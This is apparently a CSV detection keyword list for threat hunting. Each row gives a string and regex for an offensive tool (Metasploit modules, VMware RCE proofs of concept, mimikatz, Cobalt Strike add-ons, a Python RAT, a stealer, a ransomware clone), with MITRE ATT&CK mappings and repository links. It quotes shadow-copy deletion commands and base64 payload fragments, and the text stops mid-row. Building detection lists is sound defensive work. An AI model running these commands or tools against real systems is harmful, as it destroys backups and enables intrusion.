"*Vm14YVUxTXlWbkpOVm1SWFlUSlNhRlJVU2xOalJsWjBaRWRHV0dKR1NsZFhhMk0xVm14YWMyTkdXbFppV0doTVYxWlZlRlpzVG5OV2JGcFhZbFV4TkZZeFdsWmxSMDVZVTJ0V1ZHSkhhRzlaVkVrMFpERmtXR1JIUm1waVZscFpWVzEwYzJGV1NYbGxSVGxhVmpOU2FGcFhlRnBsUm1SMFQxWmtUbEpGV2twV1ZFcDNWakZSZUZwRmJGSmlWMmhZVkZWYVlVMXNjRmRY*",".{0,1000}Vm14YVUxTXlWbkpOVm1SWFlUSlNhRlJVU2xOalJsWjBaRWRHV0dKR1NsZFhhMk0xVm14YWMyTkdXbFppV0doTVYxWlZlRlpzVG5OV2JGcFhZbFV4TkZZeFdsWmxSMDVZVTJ0V1ZHSkhhRzlaVkVrMFpERmtXR1JIUm1waVZscFpWVzEwYzJGV1NYbGxSVGxhVmpOU2FGcFhlRnBsUm1SMFQxWmtUbEpGV2twV1ZFcDNWakZSZUZwRmJGSmlWMmhZVkZWYVlVMXNjRmRY.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","base64","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*VMSA-2023-0001.py*",".{0,1000}VMSA\-2023\-0001\.py.{0,1000}","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","N/A","2","150","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" "*VMware detected!!!*",".{0,1000}VMware\sdetected!!!.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","9","1","50","13","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z" "*vmware_view_planner*uploadlog_rce*",".{0,1000}vmware_view_planner.{0,1000}uploadlog_rce.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*vmware_vrni_rce_cve_2023_20887.rb*",".{0,1000}vmware_vrni_rce_cve_2023_20887\.rb.{0,1000}","offensive_tool_keyword","POC","VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)","T1068 - T1190.001 - T1210.002 - T1059.001 - T1059.003 - T1190 - T1569.002","TA0005 - TA0002 - TA0001 - TA0040 - TA0043","N/A","N/A","Exploitation tools","https://github.com/sinsinology/CVE-2023-20887","1","1","N/A","N/A","3","226","44","2023-06-13T14:39:17Z","2023-06-13T13:17:23Z" "*vmware_workspace_one_access_cve_*.rb",".{0,1000}vmware_workspace_one_access_cve_.{0,1000}\.rb","offensive_tool_keyword","POC","POC for VMWARE CVE-2022-22954","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/rapid7/metasploit-framework/blob/62bfe03b50a22785b59a069319520531f2663b2b/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb","1","1","N/A","N/A","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*VMware-vRealize-Log-Insight.cert*",".{0,1000}VMware\-vRealize\-Log\-Insight\.cert.{0,1000}","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product","N/A","2","150","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" "*vmx2john.py*",".{0,1000}vmx2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*VmxaU1MyVnJNVmRXYTJSaFRUSlNjRlZ0ZEdGWGJGSldXa2M1Vmxac2NGWlZiWGhMV1ZVeFZsTnNWbFpXYlUxNFYxWlZlR05YU2tWVGJHaG9ZVEk0ZDFkWGRHRmpiVlpZVW10c2FWSXllRTlaVjNSaFpXeFplRmR0T1ZkTlJFWkpWVEp3VjFReFpFbFJiV2hYVFVaYU1scFdXbXRqTVhCSlZHMTRWMkpZWTNoV1IzaHJaREpHVmsxWVJsSmliRnBUVkZjMVVrMUdWWGhYYkVw*",".{0,1000}VmxaU1MyVnJNVmRXYTJSaFRUSlNjRlZ0ZEdGWGJGSldXa2M1Vmxac2NGWlZiWGhMV1ZVeFZsTnNWbFpXYlUxNFYxWlZlR05YU2tWVGJHaG9ZVEk0ZDFkWGRHRmpiVlpZVW10c2FWSXllRTlaVjNSaFpXeFplRmR0T1ZkTlJFWkpWVEp3VjFReFpFbFJiV2hYVFVaYU1scFdXbXRqTVhCSlZHMTRWMkpZWTNoV1IzaHJaREpHVmsxWVJsSmliRnBUVkZjMVVrMUdWWGhYYkVw.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","base64","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*vnc_password_osx.md*",".{0,1000}vnc_password_osx\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*vnc_passwords.txt*",".{0,1000}vnc_passwords\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*vncdumpdll*",".{0,1000}vncdumpdll.{0,1000}","offensive_tool_keyword","vncpwdump","vnc password sniffer","T1003.003 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.codebus.net/d-2v0u.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*vncinject.rb*",".{0,1000}vncinject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*VNC-NoAuth -ComputerName * -Port *",".{0,1000}VNC\-NoAuth\s\-ComputerName\s.{0,1000}\s\-Port\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*vncpcap2john.*",".{0,1000}vncpcap2john\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*vncpwdump.*",".{0,1000}vncpwdump\..{0,1000}","offensive_tool_keyword","vncpwdump","vnc password sniffer","T1003.003 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.codebus.net/d-2v0u.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*vnperistence.py*",".{0,1000}vnperistence\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*VoidFunc is an exported function used with PowerSploit's Invoke-ReflectivePEInjection.ps1*",".{0,1000}VoidFunc\sis\san\sexported\sfunction\sused\swith\sPowerSploit\'s\sInvoke\-ReflectivePEInjection\.ps1.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*Volumiser.exe --image*",".{0,1000}Volumiser\.exe\s\-\-image.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","0","N/A","7","4","318","34","2023-05-05T14:03:14Z","2022-11-08T21:38:56Z" "*Volumiser\DiscUtils.Ebs\EbsMappedStream*",".{0,1000}Volumiser\\DiscUtils\.Ebs\\EbsMappedStream.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","0","N/A","7","4","318","34","2023-05-05T14:03:14Z","2022-11-08T21:38:56Z" "*voukatas/Commander*",".{0,1000}voukatas\/Commander.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","1","N/A","10","10","43","12","2023-03-24T08:37:17Z","2023-02-03T16:46:33Z" "*VPNPivot*",".{0,1000}VPNPivot.{0,1000}","offensive_tool_keyword","VPNPivot","Sometime we do external penetration testing and when we compromise the remote target we would like to explore the internal network behind and getting such compromise like owning Active directory. accessing shared files. conducting MITM attacks ... etc","T1090 - T1095 - T1562 - T1201 - T1558","TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0x36/VPNPivot","1","1","N/A","N/A","3","262","47","2016-07-21T08:49:26Z","2015-08-26T18:44:42Z" "*v-Q8Q~fEXAMPLEEXAMPLEDsmKpQw_Wwd57-albMZ*",".{0,1000}v\-Q8Q\~fEXAMPLEEXAMPLEDsmKpQw_Wwd57\-albMZ.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*vRealizeLogInsightRCE*",".{0,1000}vRealizeLogInsightRCE.{0,1000}","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","N/A","2","150","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" "*vssadmin delete shadows /all /quiet >nul*",".{0,1000}vssadmin\sdelete\sshadows\s\/all\s\/quiet\s\>nul.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*vssadmin delete shadows /for=%systemdrive% /all /quiet*",".{0,1000}vssadmin\sdelete\sshadows\s\/for\=\%systemdrive\%\s\/all\s\/quiet.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*vssenum.x64.*",".{0,1000}vssenum\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*vssenum.x86.*",".{0,1000}vssenum\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*vtiger_crm_upload_exploit*",".{0,1000}vtiger_crm_upload_exploit.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*vulfocus/spring-core-rce-*",".{0,1000}vulfocus\/spring\-core\-rce\-.{0,1000}","offensive_tool_keyword","SpringCore0day","SpringCore0day from share.vx-underground.org & some additional links","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/craig/SpringCore0day","1","1","N/A","N/A","4","393","187","2022-03-31T11:54:22Z","2022-03-30T15:50:28Z" "*vulmon*Vulmap*",".{0,1000}vulmon.{0,1000}Vulmap.{0,1000}","offensive_tool_keyword","Vulmap","Vulmap is an open-source online local vulnerability scanner project. It consists of online local vulnerability scanning programs for Windows and Linux operating systems. These scripts can be used for defensive and offensive purposes. It is possible to make vulnerability assessments using these scripts. Also. they can be used for privilege escalation by pentesters/red teamers.","T1210.001 - T1190 - T1059 - T1213","TA0007 - TA0002 - TA0008 - TA0011","N/A","N/A","Vulnerability scanner","https://github.com/vulmon/Vulmap","1","1","N/A","10","10","920","195","2023-03-18T23:56:41Z","2018-09-07T15:49:36Z" "*Vulnerabilities/RPCDump*",".{0,1000}Vulnerabilities\/RPCDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*Vulnerable Web Enrollment endpoint identified: http://*/certsrv/certsnsh.asp*",".{0,1000}Vulnerable\sWeb\sEnrollment\sendpoint\sidentified\:\shttp\:\/\/.{0,1000}\/certsrv\/certsnsh\.asp.{0,1000}","offensive_tool_keyword","adcshunter","Uses rpcdump to locate the ADCS server and identify if ESC8 is vulnerable from unauthenticated perspective.","T1018 - T1087 - T1046 - T1201 - T1595","TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/danti1988/adcshunter","1","0","N/A","7","1","76","7","2023-12-15T10:49:39Z","2023-12-14T14:31:05Z" "*vulnfactory.org/exploits/*.c*",".{0,1000}vulnfactory\.org\/exploits\/.{0,1000}\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*vulns/apache.txt*",".{0,1000}vulns\/apache\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*vulns/iis.txt*",".{0,1000}vulns\/iis\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*vulns/jrun.txt*",".{0,1000}vulns\/jrun\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*vulns/tomcat.txt*",".{0,1000}vulns\/tomcat\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*vulnweb.com/FUZZ*",".{0,1000}vulnweb\.com\/FUZZ.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*vu-ls/Crassus*",".{0,1000}vu\-ls\/Crassus.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","10","6","546","57","2024-01-08T09:38:34Z","2023-01-12T21:01:52Z" "*VVRKek1WVkdaM2RpUmtaWlRVZG9VVlpVUmxKYU1VSlVVVmMxWVUxcWJESlhha28wWWtacmVXRkliR2xOYWtaelYxWm9WMDFIU2pWT1dIQmhWMFZ2ZVZkc1pITmxWbXcxVGxkd2FVMXFRblZSTW5RMFUxWlJlRlJzVmtwU1JFSnVVMjV3Ums1Vk1YQk9TR2hQWVcxa01WUldUVEJsYTNBelkwVXhWbEpVYkZSV2EwNUNUMVZzUlZWVVFrNWtNMEpXVlRGVmVGSnNaM2h*",".{0,1000}VVRKek1WVkdaM2RpUmtaWlRVZG9VVlpVUmxKYU1VSlVVVmMxWVUxcWJESlhha28wWWtacmVXRkliR2xOYWtaelYxWm9WMDFIU2pWT1dIQmhWMFZ2ZVZkc1pITmxWbXcxVGxkd2FVMXFRblZSTW5RMFUxWlJlRlJzVmtwU1JFSnVVMjV3Ums1Vk1YQk9TR2hQWVcxa01WUldUVEJsYTNBelkwVXhWbEpVYkZSV2EwNUNUMVZzUlZWVVFrNWtNMEpXVlRGVmVGSnNaM2h.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","base64","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*VXpCMk1UTjBjMU14YkhZemNsSTBibk13YlhjMGNqTQ*",".{0,1000}VXpCMk1UTjBjMU14YkhZemNsSTBibk13YlhjMGNqTQ.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*vyrus001/go-mimikatz*",".{0,1000}vyrus001\/go\-mimikatz.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/vyrus001/go-mimikatz","1","1","N/A","10","6","598","103","2022-09-08T18:14:20Z","2015-10-22T08:43:38Z" "*vysecurity*",".{0,1000}vysecurity.{0,1000}","offensive_tool_keyword","Github Username","github username hosting red team tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/vysecurity","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*vysecurity/ANGRYPUPPY*",".{0,1000}vysecurity\/ANGRYPUPPY.{0,1000}","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 